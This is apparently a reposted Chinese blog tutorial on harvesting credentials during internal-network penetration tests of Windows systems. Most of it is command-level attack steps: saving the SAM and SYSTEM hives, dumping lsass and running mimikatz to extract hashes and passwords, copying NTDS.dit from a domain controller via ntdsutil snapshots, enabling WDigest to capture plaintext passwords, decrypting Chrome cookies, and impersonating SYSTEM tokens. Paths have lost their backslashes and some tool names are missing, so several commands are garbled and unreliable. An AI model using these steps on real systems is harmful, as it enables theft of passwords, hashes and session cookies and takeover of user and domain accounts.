内网渗透测试的艺术[二]凭证收集

阅读: 评论:0

内网渗透测试的艺术[二]凭证收集

内网渗透测试的艺术[二]凭证收集

内网渗透测艺术一凭证收集

收集本机凭据是非常重要的环节.通常我们可以收集的凭据包括但不限于:Windows hash [NTLM,LM],浏览器密码、cookie 远程桌面密码 VPN密码 WLAN密码 IIS服务器密码 FTP密码等等.

WINDOWS密码

Windows密码加密后一般两种形式

NTLM哈希和LM哈希[VISTA和2008已经取消]这些哈希有两个存储位置,本地用户在SAM数据库,

域用户存储在域控制器的NTDS.dit数据库中.当用户登陆时,这些哈希也可能存储在内存中,能够被我们抓取到

SAM 是什么?

安全账号管理器-也就是存储用户密码的数据库文件,

他在%systemroot%system32/config/SAM中,挂载在HKLM/SAM上.

为了防破解,windows核心版本NT4.0中引入了SYSTEM函数,SAM的磁盘上副本文件将被部分加密,以便存储在SAM中所有的本地账户immature哈希都使用密钥(成SYSKEY加密)

提取SAM 数据库哈希方法

导出sam数据库中的密码

UAC权限问题后续讲解

方法1:以管理员权限运行cmd,输入以下命令

reg save hklmsam c:sam.hive

reg save hklmsystem c:system.hive

方法2:使用powershell

powershell -exec bypass Import-Module .invoke-ninjacopy.ps1

Invoke-NinjaCopy -Path C:WindowsSystem32configSAM -LocalDestination .sam.hive

Invoke-NinjaCopy -Path C:WindowsSystem32configSYSTEM -LocalDestination .system.hive

将生成的sam.hive与system.hive转至本地,使用saminside或cain导入

Saminside

image.png

image.png

其他方式提取离线凭证

<

离线提取进行lsass

vista及以上系统可以看到lsass进程, 右键创建转储文件.

< - lsass.dmp

获取到内存转储文件后,就可以使用mimikatz提取密码.这里需要注意的是,运行mimikatz平台架构要与转储的系统兼容

Sekurlsa::minidump lsass.dmp

Sekurlsa::logonpasswords

导出域用户hash

访问域控的C:WindowsNTDS文件夹

image.pngimage.png

记录GUID并且替换之后的命令 9b9f86d4-0e2c-4c85-8468-261dc610da3b

ntdsutil snapshot “mount {GUID}” quit quit

C盘中会生成新目录,将其中的WindowsNTDSntds.dit拷贝出来

image.png

ntdsutil snapshot “unmount {GUID}” quit quit

ntdsutil snapshot " delete {GUID} " quit quit

使用提取hash

< -r -d C:ntds.dit –

image.png

mimakatz获取hash与明文口令

privilege::debug

sekurlsa::logonPasswords

从 Windows 8.1 和 Windows Server 2012 R2 开始,LM 哈希和“纯文本”密码将不在内存中生成,早期版本的Windows 7/8/2008 R2/2012 需要打 kb2871997 补丁。

这里只抓取到了NTLM

image.png

破解MD5 cmd5

image.png

尝试破解2-ophcrack .php

image.png

修改注册表,启用摘要密码支持

需要创建UseLogonCredential,并赋值为1

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProviders WDigest “UseLogonCredential”(DWORD)

重新登录后,再次运行就会直接抓取明文密码

这里再扩展两个信息收集的敏感点

mimikatz提取chrome中保存的cookie
首先把chrome保存cookie的文件拷贝到桌面上方便操作,这个文件在 C:users360secappdatalocalgooglechromeuser datadefaultcookies

命令行下拷贝的命令是:

Copy 'C:users360secappdatalocalgooglechromeuser datadefaultcookies ’ c:users360secdesktop

mimikatz_trunk文件包中有个x64文件夹,进入并打开

输入

dpapi::chrome /in:c:users360secdesktopcookies /unprotect提取cookie

mimikatz的token模块中的命令列出token,模仿system用户token
选择以管理员身份运行,

privilege::debug获取debug权限

token::elevate模仿system用户的令牌

token::list列出令牌

lsadump::sam来获取sam数据库中的密码

token::revert恢复令牌

webbrowserpassview也可以获取chrome的保存的密码
日常使用Mimikatz 因为有powershell版本,☺

一句话执行

powershell Import-Module .Invoke-Mimikatz.ps1;Invoke-Mimikatz -Command ‘“privilege::debug” “sekurlsa::logonPasswords full”’

本文发布于:2024-02-03 04:12:53,感谢您对本站的认可!

本文链接:https://www.4u4v.net/it/170690477148572.html

版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。

标签:凭证   内网   测试   艺术
留言与评论(共有 0 条评论)
   
验证码:

Copyright ©2019-2022 Comsenz Inc.Powered by ©

网站地图1 网站地图2 网站地图3 网站地图4 网站地图5 网站地图6 网站地图7 网站地图8 网站地图9 网站地图10 网站地图11 网站地图12 网站地图13 网站地图14 网站地图15 网站地图16 网站地图17 网站地图18 网站地图19 网站地图20 网站地图21 网站地图22/a> 网站地图23